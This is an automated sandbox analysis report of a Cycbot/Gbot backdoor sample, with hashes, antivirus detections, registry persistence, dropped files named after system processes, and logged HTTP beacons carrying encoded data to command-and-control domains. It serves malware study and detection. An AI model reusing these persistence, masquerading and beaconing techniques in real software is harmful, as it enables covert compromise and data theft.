Analysis Date: 2014-06-15 01:33:14
MD5: 3511ecc0b6540c04aacc15953a57ccee
SHA1: 68593cc40e4090f61181c51cc016893574690579

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 389b56c0e4359d569087af5d8c8f60eb sha1: 2cf9f7f07a7f146fe7995d2da74ced2545fd34c1 size: 123904
Section: .rdata md5: 2ce1140348c54dd87480f036cfbbe41e sha1: cbb694bef23352d6ed7d69887d4c8d5d6f71dcaa size: 1536
Section: .data md5: 6c8a2d618d24bfd8b191a2379e319a11 sha1: 7f6d5830bc55f8fb66779a9c1af141cd8efed163 size: 39424
Section: .rsr md5: 71ca7e86ec74867c678169dd9af02c55 sha1: 2ef56aec57812893f1ab1bb6c179f4a1073f6fd9 size: 512
Timestamp: 2005-08-27 10:17:40
Version: PrivateBuild: 1396
PEhash: ad84bbef0ecd29113cd044ac2165286e00ef5134
IMPhash: 3b4f08c11b8bdf3bcf4dcef40b8ad892
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Pakes.psa
AV CA (E-Trust Ino): Win32/Gbot.A!generic
AV CAT (quickheal): Trojan.Pakes.gen
AV ClamAV: Trojan.Diple-20
AV Dr. Web: Trojan.Packed.21411
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Cycbot.AD
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV Kaspersky: Backdoor.Win32.Gbot.qr
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Norman: winpe/Cycbot.BH
AV Rising: Trojan.Win32.Generic.12742BA8
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.Gen
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bigspiderwomen.com
Winsock DNS: 127.0.0.1
Winsock DNS: zoneij.com
Winsock DNS: zonedg.com
Winsock DNS: pcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: pcdocpro.com (Type: A) ➝ 209.59.161.20
DNS: zonetf.com (Type: A) ➝ 208.73.211.167
DNS: zonetf.com (Type: A) ➝ 208.73.211.161
DNS: zonetf.com (Type: A) ➝ 208.73.211.250
DNS: zonetf.com (Type: A) ➝ 208.73.211.182
DNS: zonetf.com (Type: A) ➝ 208.73.211.176
DNS: zonedg.com (Type: A) ➝ 208.73.211.175
DNS: zonedg.com (Type: A) ➝ 208.73.211.168
DNS: zonedg.com (Type: A) ➝ 208.73.211.165
DNS: zonedg.com (Type: A) ➝ 208.73.210.218
DNS: zonedg.com (Type: A) ➝ 208.73.210.215
DNS: zoneij.com (Type: A)
DNS: bigspiderwomen.com (Type: A)
HTTP GET: http://pcdocpro.com/images/logo-2.jpg?tq=gP4aKyd5eCO0Ust%2B%2BV3NKHhR2X7r151aUYh2dm6g8xm5g44Sk85kvaoBYX%2FLO94k4mQlYWLT1O4P5d2MY63GyQEy7ZBwZuzINd%2FUW906S%2BMenEvVh25cdR9KlDKDc1tvdo3qfDA9crrNyVsTJYIM2Hcyf9hqg5u%2Fut%2BP6R0EY9cGh30wWKrAGYoSxwOPtj%2FiJUfrxPa4Rcox9TPSRxqeUsqSiEaYLbn%2B2GfmKk5%2FOuW0OQGjB4OQqsob8gMvBIu98rIpO5ZCWeu4cXgJwEe9O%2FsTFts7YSdFlqhaE1DqyS4lvPlukAiNJO%2BkGSDkZj7A3ryi2B%2Bdqz9kOhe5mSjnjBk0H4YSJgQV7YEqqESFGoEbD1SS%2Bin1k%2FotQGzsz0ks5XeYpnIJOZVzUyJh0Z5eUxS1olcceFAt5QIV7SnQJw5VKBLNQfeK6%2Bo2Z9cKR7rACsLKos3EAS3ntJhAZbghfP0Xp16cV%2FuNeSue4dBM7qXTEzSiY2GMLL9Ah2%2F7y5Q8Ts54yPLQCeiAZmnZWYYxGbMZInxPwQ
User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
Flows TCP: 192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.211.167:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.175:80

Raw Pcap

Strings
040904b0
1396
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
AlphaBlend
BitBlt
ClipCursor
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COMCTL32.dll
CoUninitialize
CreateBitmap
CreateCompatibleDC
CreateDCW
CreateDIBSection
CreatePen
CreatePopupMenu
DeleteDC
DestroyMenu
EnumResourceNamesW
ExitProcess
FindWindowA
GDI32.dll
GdipCreateBitmapFromFile
GdipDisposeImage
GdipGetImageHeight
GdipGetImagePixelFormat
GdipGetImageWidth
gdiplus.dll
GetDesktopWindow
GetHandleInformation
GetModuleFileNameA
GetObjectType
GetVersionExA
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
KERNEL32.dll
LineTo
LoadLibraryW
LocalAlloc
LocalFree
MSIMG32.dll
ole32.dll
RedrawWindow
SelectObject
SetStretchBltMode
StretchBlt
StringFromGUID2
!This program cannot be run in DOS mode.
timeGetTime
TrackPopupMenuEx
TransmitCommChar
TransparentBlt
USER32.dll
WINMM.dll